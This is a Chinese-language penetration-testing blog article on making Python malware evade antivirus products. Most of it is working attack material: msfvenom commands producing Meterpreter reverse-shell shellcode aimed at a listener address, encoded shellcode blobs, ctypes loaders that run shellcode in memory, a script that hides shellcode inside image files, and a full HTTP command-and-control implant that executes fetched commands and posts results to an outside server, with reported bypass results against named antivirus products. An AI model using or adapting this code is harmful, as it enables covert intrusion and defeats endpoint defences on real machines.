python的另类免杀
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
0x01 python优缺性
python的应用领域很广,基本整个互联网都在使用它,这也得益于它丰富的第三方库,以及学习简单,成本低。
作为安全工作者更是离不开它,可以快速的写脚本工具,并且很多安全渗透工具都是以python开发的,比如我们熟知的sqlmap,OneForAll,dirsearch等等。
在免杀方面,近年来python作为后起之秀,也被杀毒软件盯得死死的,很离谱的是python写个helloworld,用pyinstaller打包,也会有杀毒软件报毒…..抛弃这个不谈,python使用pyinstaller打包的文件也很大,随便打包一个文件都有6-7m,但纵使它有这些缺点,我依旧喜欢它。
0x02 python免杀环境
首先声明我这里使用的环境:
python3.8 (32位,主程序)
pyinstaller (打包器)
PyCharm (开发环境)
kali自带msf (shellcode生成)
kali自带nc (接收cmd)
0x03 免杀实践
一、对shellcode或代码加解密
1.简单的加密
首先打开kali的msf,生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.1.131 lport=6666 -f c
将生成的shellcode复制下来,使用python处理成一段字符串:
test='''
"x2fx4fx69x50x41x41x41x41x59x49x6ex6cx4dx64x4a"
"x6bx69x31x49x77x69x31x49x4dx69x31x49x55x4dx66"
"x2bx4cx63x69x67x50x74x30x6fx6dx4dx63x43x73x50"
"x47x46x38x41x69x77x67x77x63x38x4ex41x63x64x4a"
"x64x65x39x53x56x34x74x53x45x49x74x43x50x41x48"
"x51x69x30x42x34x68x63x42x30x54x41x48x51x69x31"
"x67x67x55x49x74x49x47x41x48x54x68x63x6cx30x50"
"x45x6dx4cx4ex49x73x42x31x6ax48x2fx4dx63x43x73"
"x77x63x38x4ex41x63x63x34x34x48x58x30x41x33x33"
"x34x4fx33x30x6bx64x65x42x59x69x31x67x6bx41x64"
"x4ex6dx69x77x78x4cx69x31x67x63x41x64x4fx4cx42"
"x49x73x42x30x49x6cx45x4ax43x52x62x57x32x46x5a"
"x57x6cx48x2fx34x46x68x66x57x6fx73x53x36x59x44"
"x2fx2fx2fx39x64x61x44x4dx79x41x41x42x6fx64x33"
"x4dx79x58x31x52x6fx54x48x63x6dx42x34x6ex6fx2f"
"x39x43x34x6bx41x45x41x41x43x6ex45x56x46x42x6f"
"x4bx59x42x72x41x50x2fx56x61x67x70x6fx77x4bx68"
"x51x68x47x67x43x41x42x6fx4bx69x65x5ax51x55x46"
"x42x51x51x46x42x41x55x47x6ax71x44x39x2fx67x2f"
"x39x57x58x61x68x42x57x56x32x69x5ax70x58x52x68"
"x2fx39x57x46x77x48x51x4bx2fx30x34x49x64x65x7a"
"x6fx5ax77x41x41x41x47x6fx41x61x67x52x57x56x32"
"x67x43x32x63x68x66x2fx39x57x44x2bx41x42x2bx4e"
"x6fx73x32x61x6bx42x6fx41x42x41x41x41x46x5ax71"
"x41x47x68x59x70x46x50x6cx2fx39x57x54x55x32x6f"
"x41x56x6cx4ex58x61x41x4cx5ax79x46x2fx2fx31x59"
"x50x34x41x48x30x6fx57x47x67x41x51x41x41x41x61"
"x67x42x51x61x41x73x76x44x7ax44x2fx31x56x64x6f"
"x64x57x35x4ex59x66x2fx56x58x6cx37x2fx44x43x51"
"x50x68x58x44x2fx2fx2fx2fx70x6dx2fx2fx2fx2fx77"
"x48x44x4bx63x5ax31x77x63x4fx37x38x4cx57x69x56"
"x6dx6fx41x55x2fx2fx56";
'''
print(test.replace('n','').replace('"','').replace(';','').replace(' ',''))
将生成的字符串保存。
如:
/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
首先使用最基本的shellcode加载代码进行执行:
代码一:
import ctypes
import base64
s = '''
/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
'''
shellcode = base64.b64decode(s)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
代码二:
import ctypes
import base64
shellcode='''/OiPAAAAYInlMdJki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB0TAHQi1ggUItIGAHThcl0PEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeBYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/VagpowKhQhGgCABoKieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoZwAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0oWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCQPhXD////pm////wHDKcZ1wcO78LWiVmoAU//V
'''
data=base64.b64decode(shellcode)
bdata = bytearray(data)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(bdata)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
两者均可以上线msf。
那么此时上述两个shellcode加载器均无法达到免杀,那么根据正常的思路就是fuzz测试了,对代码进行增删,看杀毒软件主要查杀哪部分,但是使用的方式多了,效果也就变差了,我们换一种思路。
对整个代码进行base64编码,效果怎么样?
import base64
import win32api, win32con
def test():
test = '''
aW1wb3J0IGN0eXBlcwppbXBvcnQgYmFzZTY0CnMgPSAnJycKL09pUEFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVU1mK0xjaWdQdDBvbU1jQ3NQR0Y4QWl3Z3djOE5BY2RKZGU5U1Y0dFNFSXRDUEFIUWkwQjRoY0IwVEFIUWkxZ2dVSXRJR0FIVGhjbDBQRW1MTklzQjFqSC9NY0Nzd2M4TkFjYzQ0SFgwQTMzNE8zMGtkZUJZaTFna0FkTm1pd3hMaTFnY0FkT0xCSXNCMElsRUpDUmJXMkZaV2xILzRGaGZXb3NTNllELy8vOWRhRE15QUFCb2QzTXlYMVJvVEhjbUI0bm8vOUM0a0FFQUFDbkVWRkJvS1lCckFQL1ZhZ3Bvd0toUWhHZ0NBQm9LaWVaUVVGQlFRRkJBVUdqcUQ5L2cvOVdYYWhCV1YyaVpwWFJoLzlXRndIUUsvMDRJZGV6b1p3QUFBR29BYWdSV1YyZ0MyY2hmLzlXRCtBQitOb3MyYWtCb0FCQUFBRlpxQUdoWXBGUGwvOVdUVTJvQVZsTlhhQUxaeUYvLzFZUDRBSDBvV0dnQVFBQUFhZ0JRYUFzdkR6RC8xVmRvZFc1TllmL1ZYbDcvRENRUGhYRC8vLy9wbS8vLy93SERLY1oxd2NPNzhMV2lWbW9BVS8vVgonJycKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzKQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEp
'''
tel = win32api.MessageBox(0, "这是一个病毒,你要运行吗?", "一起来玩呀", win32con.MB_YESNOCANCEL) # 是 6 否 7 取消 2
print(tel)
if tel == 7:
exec(base64.b64decode(test))
elif tel == 2:
dir('再见')
else:
dir('再见')
test()
上面增加了一个判断。如果选择否,则执行恶意代码,选择”取消”或者”是”则不执行代码。
免杀效果方面在(2022-7-19)
测试可过,火绒,管家,以及eset(试用版)。
360在上线5min后被查杀。
这里测试了一下微步,3/21,判断为木马,还是不太行啊,可能base64加密太简单了,那根据我上篇文章
https://forum.butian.net/share/1580
在这篇文章里介绍了一种加密,当时只是提供了一种思路,代码之类的没有给出,那么这次就用这个加密加强版试试
代码:
# -*- coding: utf-8 -*-
import Tulipdecode
import win32api, win32con
tel = win32api.MessageBox(0, "好兄弟", "一起来玩呀", win32con.MB_YESNOCANCEL) # 是 6 否 7 取消 2
if tel == 7:
dir()
elif tel == 2:
app = Tulipdecode.Eternal()
abc = app.api_jie(
sc='????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????',
sjc=10947, xzys='单身的素面朝天更难吸引桃花运的注意。恋爱中的需要正视感情的问题,并积极解决。', cpuzy=42342)
exec(abc)
else:
dir('再见')
那么物理机测试的话,360全家桶,火绒,管家,eset都可以过,微步测试安全,但是检测2/22,
有两个大兄弟只要是pyinstaller编译的就报毒。
github地址:
https://github.com/suansuancwk/Tulip
分离加载
接着就谈谈分离免杀吧,顾名思义分离免杀就把shellcode与加载器分离,为了跟好的隐藏shellcode,我们可以将shellcode注入到图片中进行隐藏,这里写个脚本将shellcode注入到图片中,需要准备一张正常的图片,和一段shellcode。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.132 lport=6666 -f raw -o shellcode.jpg
这里生成了一张包含shellcode的图片,但是什么都没有,很容易怀疑,那么我们再找张图片,将两张图片进行结合,使shellcode的图片显示为正常的图片。
这里参考小玉玉大佬的代码,
python实现的分离免杀: python实现的分离免杀 (gitee.com)
这里代码路稍微改一下,并不是只有jpg可以使用,其他格式也可以。
代码如下:
import os
def injectimage(file):
if os.path.getsize("output/payload.jpg") == 0:
print("原始shellcodeh获取失败,请检查源代码!")
return 0
shellf = open("output/payload.jpg",'rb')
shellcode = shellf.read()
os.system("mv "+file+" output/"+file)
psize = os.path.getsize("output/"+file)
f = open("output/"+file,'ab+')
f.seek(psize)
f.write(shellcode)
newsize = os.path.getsize("output/"+file)
if newsize>psize or newsize==psize:
print("图片注入成功!")
return psize
def genexe(file,lo):
pyfile = "import osn
import ctypesn
import base64n
f = open('"+file+"', 'rb')n
size = os.path.getsize('"+file+"')n
f.seek("+str(lo)+")n
data = f.read()n
f.close()n
bdata = bytearray(data)n
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_intn
n
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),n
ctypes.c_int(0x40))n
n
buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)n
eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKGJkYXRhKSkp'))n
n
handle = ctypes.windll.kernel32.CreateThread(n
ctypes.c_int(0),n
ctypes.c_int(0),n
ctypes.c_int(ptr),n
ctypes.c_int(0),n
ctypes.c_int(0),n
ctypes.pointer(ctypes.c_int(0)))n
n
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))n
"
af = open("payload.py",'w')
af.write(pyfile)
# os.system("pyinstaller -F payload.py")
if __name__ == '__main__':
targetfile = input("请输入图片的路径 :")
if targetfile == '':
print("你没有选择一张图片,将默认使用整个shellcode转换成图片")
os.system("touch demo.png")
targetfile = "demo.png"
location = injectimage(targetfile)
genexe(targetfile,location)
改了一点,这里按照上面生成的效果如下:
运行可以上线,但是吗,免杀可能稍微不太行了,时间太久了,先不管shellcode加载器,单单看看shellcode图片,这是原始直接生成的,
:
这里换成base64加密的shllcode图片,
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.80.132 lport=6666 -f raw -o shellcode.jpg
效果相对较好了,那么相应的就需要修改代码了,增加一句base64解密就行了
import os
import ctypes
import base64
f = open('tx.jpg', 'rb')
size = os.path.getsize('tx.jpg')
f.seek(67558)
data = f.read()
f.close()
data=base64.b64decode(data)
bdata = bytearray(data)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(bdata)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(bdata)).from_buffer(bdata)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(bdata)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
另外一种加载器的写法如下:
import os
import ctypes
import base64
f = open('tx.jpg', 'rb')
size = os.path.getsize('tx.jpg')
f.seek(67558)
data = f.read()
f.close()
shellcode = base64.b64decode(data)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
以上代码均可以上线。
接下开就是打包了,但是这样免杀成功率未知,可以将上面代码全部加密,加密的方法参考前面。
免杀性就不测试了,由于环境原因,大家可以进行测试,应该不会太差。
远程分离加载就比较简单了,简单就是将包含shellcode或者直接将shellcode放到互联网或者可以获取到的地方,比如图片就可以放到图上,shellcode进行加密放到互联网上等等
将上面的代码或者图片request下来就可以了,原理差不对。
“借刀杀人”
这种方法不建议真实测试,仅供学习参考….
假如我们将直接使用python的system函数执行命令,不使用cs或者msf,达到远控的目的,类似于webshell,这样我们就可以将需要执行的命令放到互联网上,且回显的命令也可以返回到互联网上,可以使用request请求,中间需要心跳时间,多久request一次。简单结构图如下:
上述是使用两台媒介靶机,也可以使用一台,接收与发送都是同一个媒介,但是相对了两台媒介效果好些
这里我不使用真实网站测试,使用本地环境测试。
以下内容均虚拟环境,请勿在真实环境下进行!!!!
一个正常的html页面:
一个php文件,在phpstudy下搭建:
<?php
header("content-type:text/html;charset=utf-8");
if(isset($_COOKIE['id'])&& isset($_COOKIE['time']) && isset($_POST['data']) ){
$id=$_COOKIE['id'];
$time=$_COOKIE['time'];
$data=$_POST['data'];
$myfile = fopen("log.txt", "w") or die("Unable to open file!");
$txt = $data.",".$id.",".$time;
fwrite($myfile, $txt);
fclose($myfile);
}
?>
控制端python代码:
import os
import sys
import time
import lljiam
import lljiem
def getdata():
with open('index1.html', 'r', encoding='utf8') as f:
data = f.read()
f.close()
# print(data)
return data
def fsml(data):
ml = input('执行命令>>>')
app = lljiam.Eternal()
test = app.api_jia('2', ml, zfc='suansuan') # 密文 cpu 时间戳
# print(test)
html = data.format(time=test[2], cpu=test[1], ml=test[0])
with open('index.html', 'w') as f:
f.write(html)
f.close()
if ml == 'exit()':
sys.exit(0)
# fsml(getdata())
def readhx():
with open('log.txt', 'r') as f:
jg = f.read()
f.close()
jg = jg.split(',')
data = jg[0]
cpu = jg[1]
time1 = jg[2]
app = lljiem.Eternal()
ml = app.api_jie(sc=data, sjc=time1, xzys='suansuanadmin', cpuzy=cpu)
print(ml)
os.remove("log.txt")
# readhx()
def ks():
while True:
data = getdata()
fsml(data)
pd()
time.sleep(2)
def pd():
while 1:
if not os.path.exists('log.txt'):
time.sleep(1)
else:
readhx()
break
ks()
被控端代码:
import os
import sys
import time
import lljiem
import requests
import lljiam
def klj_eval(ml):
try:
result = os.popen(ml,'r').read()
except:
result = '出错了'
# print(result)
return result
def getml():
html = requests.get(url='http://192.168.80.1:8000').text
ml = html.split('<!--t')[1].split('t-->')[0]
sjc = html.split('<!--l')[1].split('l-->')[0]
cpu = html.split('<!--f')[1].split('f-->')[0]
# print(ml)
# print(sjc)
# print(cpu)
app = lljiem.Eternal()
ml = app.api_jie(sc=ml, sjc=sjc, xzys='suansuan', cpuzy=cpu)
return ml, sjc
def fshx(hx):
ml = hx
app = lljiam.Eternal()
test = app.api_jia('2', ml, zfc='suansuanadmin') # 密文 cpu 时间戳
headers = {
"cookie": "id=" + str(test[1]) + ';' + 'time=' + str(test[2])
}
data = {
"data": test[0]
}
requests.post(url='http://127.0.0.1:86/cookie.php', data=data, headers=headers)
# fshx(klj_eval(getml()))
def ks():
sjc1 = 0
while True:
time.sleep(2)
mls = getml()
ml = mls[0]
if ml == 'exit()':
sys.exit(0)
else:
if sjc1 != mls[1]:
hx = klj_eval(ml)
fshx(hx)
sjc1 = mls[1]
else:
pass
time.sleep(60)
ks()
另外两个py文件(lljiam,lljiem)是上述加密代码更改版,将爱心替换成了英文字母。
并且上述被控端存在一个心跳时间也就是60s。
上面环境以及代码稍后放到github,仅供参考学习,其他与本人无关:
上述代码比较简单,原理就是,通过一个中间的服务器作为媒介,接收命令,并且获取命令回显结果,这个是在本地搭建,那么假如我在本地搭建一个cms程序,注册用户登录,在个人简介里输入加密后的命令,让客户端get下来,在由客户端解密,并将执行命令的结果加入到图片里,post到图床,控制端再get下来,结果怎么样呢?
这里仅本地演示,更多的利用方式各位师傅自己探索,大致流程图在上述的图片里。
github地址:
suansuancwk/http_bypssAV: http另类的免杀,仅供学习参考!!!(github.com)
0x04 总结
最后的一个项目其实还不太完整,有很多需要优化的地方,当然这里只是提供一种思路,一种学习的思路,不要用该项目做非法测试!!!!
这里的python吗,免杀代码较多,且繁琐,后续将会发布python的一行代码免杀,代码则相对来说较少,采用的则主要是分离免杀,搞文章主要是扩展思路。
感谢给位师傅阅读。
本文源于奇安信攻防社区: https://forum.butian.net/share/1794 若有侵权,请联系删除
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/7840.html
赞 (2)
moonsec
实战 | 记一次Word文档网络钓鱼以及绕过火绒,电脑管家和Windows Defender
« 上一篇
2022年11月19日 am9:31
渗透测试技巧|Everything的利用
下一篇 »
2022年11月19日 am9:31
